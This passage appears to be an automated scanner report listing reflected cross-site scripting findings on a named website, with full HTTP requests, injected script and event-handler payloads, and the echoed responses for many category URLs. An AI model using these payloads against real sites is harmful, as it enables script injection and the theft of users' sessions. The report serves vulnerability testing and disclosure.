HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:15 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=c9fc09992ed626cd30e0aa1f1de89800; expires=Wed, 12-Dec-2035 00:33:19 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/nfl-football77ada"><script>alert(1)</script>23cd133b9c6%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8b9d"><script>alert(1)</script>a42d6d37c17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/politicsa8b9d"><script>alert(1)</script>a42d6d37c17 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:34 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=0473a65f54747b8db9e7ae0461dd8187; expires=Wed, 12-Dec-2035 00:32:35 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15303
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/politicsa8b9d"><script>alert(1)</script>a42d6d37c17%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9937<img%20src%3da%20onerror%3dalert(1)>aa7607671fc was submitted in the REST URL parameter 2. This input was echoed as b9937<img src=a onerror=alert(1)>aa7607671fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/politicsb9937<img%20src%3da%20onerror%3dalert(1)>aa7607671fc HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:04 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=a652805a2cb13e206f2395c049b2b804; expires=Wed, 12-Dec-2035 00:33:04 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76289
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8a363<img%20src%3da%20onerror%3dalert(1)>f6bd06caa1e was submitted in the REST URL parameter 2. This input was echoed as 8a363<img src=a onerror=alert(1)>f6bd06caa1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/real-estate8a363<img%20src%3da%20onerror%3dalert(1)>f6bd06caa1e HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:53 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=d162d3d3921b234f118d826756f59278; expires=Wed, 12-Dec-2035 00:32:54 GMT; path=/ Content-Length: 76361 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 class="headline">Top Real Estate8a363<img Src=a Onerror=alert(1)>f6bd06caa1e Blogs </h1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f71fb"><script>alert(1)</script>10d32514335 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/real-estatef71fb"><script>alert(1)</script>10d32514335 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:29 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=1d24ec56f99518bd28c998f49f008da0; expires=Wed, 12-Dec-2035 00:32:30 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15342
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/real-estatef71fb"><script>alert(1)</script>10d32514335%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eda3f"><script>alert(1)</script>c887d936b5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/regional-newseda3f"><script>alert(1)</script>c887d936b5e HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:37 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=954225393b117835cb831355dab346ee; expires=Wed, 12-Dec-2035 00:32:39 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/regional-newseda3f"><script>alert(1)</script>c887d936b5e%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eae31<img%20src%3da%20onerror%3dalert(1)>95cdeb24803 was submitted in the REST URL parameter 2. This input was echoed as eae31<img src=a onerror=alert(1)>95cdeb24803 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/regional-newseae31<img%20src%3da%20onerror%3dalert(1)>95cdeb24803 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:02 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=78f60eb0de1271983c72af4e604567de; expires=Wed, 12-Dec-2035 00:33:02 GMT; path=/ Content-Length: 76409 Connection: close Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e8b"><script>alert(1)</script>7f6f717667b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/science72e8b"><script>alert(1)</script>7f6f717667b HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:36 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=1ef546de21b5bb14645f77942590db53; expires=Wed, 12-Dec-2035 00:32:37 GMT; path=/ Content-Length: 15290 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/science72e8b"><script>alert(1)</script>7f6f717667b%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa2bb<img%20src%3da%20onerror%3dalert(1)>2cf92fd20cf was submitted in the REST URL parameter 2. This input was echoed as fa2bb<img src=a onerror=alert(1)>2cf92fd20cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/sciencefa2bb<img%20src%3da%20onerror%3dalert(1)>2cf92fd20cf HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:04 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=b143c3dd52a46dcd4340dce7c14e3796; expires=Wed, 12-Dec-2035 00:33:05 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76265
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d84d0<img%20src%3da%20onerror%3dalert(1)>b3994a8de5e was submitted in the REST URL parameter 2. This input was echoed as d84d0<img src=a onerror=alert(1)>b3994a8de5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/soccerd84d0<img%20src%3da%20onerror%3dalert(1)>b3994a8de5e HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:34:08 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=ef9d53ca54d23e750bf7e63d0e7cf5d1; expires=Wed, 12-Dec-2035 00:34:08 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76241
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c88b"><script>alert(1)</script>20d0cbe266b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/soccer4c88b"><script>alert(1)</script>20d0cbe266b HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:43 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=575c7304557adf6bcf5056c897593eb3; expires=Wed, 12-Dec-2035 00:33:44 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/soccer4c88b"><script>alert(1)</script>20d0cbe266b%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8e3c1<img%20src%3da%20onerror%3dalert(1)>fd90180113b was submitted in the REST URL parameter 2. This input was echoed as 8e3c1<img src=a onerror=alert(1)>fd90180113b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/sports8e3c1<img%20src%3da%20onerror%3dalert(1)>fd90180113b HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:18 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=8b3a0b559c49ac76f971d5929f872fab; expires=Wed, 12-Dec-2035 00:33:19 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76241
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69819"><script>alert(1)</script>e8996b4d089 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/sports69819"><script>alert(1)</script>e8996b4d089 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:53 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=b5437e28df1c1b8eec2552cfca4147b0; expires=Wed, 12-Dec-2035 00:32:54 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/sports69819"><script>alert(1)</script>e8996b4d089%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf8f9<img%20src%3da%20onerror%3dalert(1)>0dd420935b6 was submitted in the REST URL parameter 2. This input was echoed as bf8f9<img src=a onerror=alert(1)>0dd420935b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/stocksbf8f9<img%20src%3da%20onerror%3dalert(1)>0dd420935b6 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:01 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=16f8a07625fbf5301a7c9e8dd9ae74f7; expires=Wed, 12-Dec-2035 00:33:01 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76241
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d17c"><script>alert(1)</script>b11a9897760 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/stocks3d17c"><script>alert(1)</script>b11a9897760 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:36 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=f8d7b5dfe1350e3874199b41523179fb; expires=Wed, 12-Dec-2035 00:32:37 GMT; path=/ Content-Length: 15277 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/stocks3d17c"><script>alert(1)</script>b11a9897760%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9315c<img%20src%3da%20onerror%3dalert(1)>317e135e22e was submitted in the REST URL parameter 2. This input was echoed as 9315c<img src=a onerror=alert(1)>317e135e22e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/technology9315c<img%20src%3da%20onerror%3dalert(1)>317e135e22e HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:01 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=d9485efe5aab214847e580cbca3ce0f9; expires=Wed, 12-Dec-2035 00:33:02 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76337
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dc00"><script>alert(1)</script>5073fc1ed8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/technology5dc00"><script>alert(1)</script>5073fc1ed8 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:37 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=e403602586a0fa913264119a9e38ea6c; expires=Wed, 12-Dec-2035 00:32:38 GMT; path=/ Content-Length: 15321 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/technology5dc00"><script>alert(1)</script>5073fc1ed8%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 624c0<img%20src%3da%20onerror%3dalert(1)>d656336a4f7 was submitted in the REST URL parameter 2. This input was echoed as 624c0<img src=a onerror=alert(1)>d656336a4f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/tv624c0<img%20src%3da%20onerror%3dalert(1)>d656336a4f7 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:34:41 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=6549bd5803f7a9fccbf5fab6514d3d8a; expires=Wed, 12-Dec-2035 00:34:42 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76145
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c812"><script>alert(1)</script>cb17deebd63 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/tv8c812"><script>alert(1)</script>cb17deebd63 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:34:13 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=fef7ef05b344cee33eb4d265468d85f2; expires=Wed, 12-Dec-2035 00:34:13 GMT; path=/ Content-Length: 15225 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/tv8c812"><script>alert(1)</script>cb17deebd63%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6330"><script>alert(1)</script>3327836ed19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/world-newsa6330"><script>alert(1)</script>3327836ed19 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:37 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=44f707dd424875adbdc5fe37eaf50dfe; expires=Wed, 12-Dec-2035 00:32:37 GMT; path=/ Content-Length: 15329 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/world-newsa6330"><script>alert(1)</script>3327836ed19%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69f36<img%20src%3da%20onerror%3dalert(1)>041a23ee282 was submitted in the REST URL parameter 2. This input was echoed as 69f36<img src=a onerror=alert(1)>041a23ee282 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/world-news69f36<img%20src%3da%20onerror%3dalert(1)>041a23ee282 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
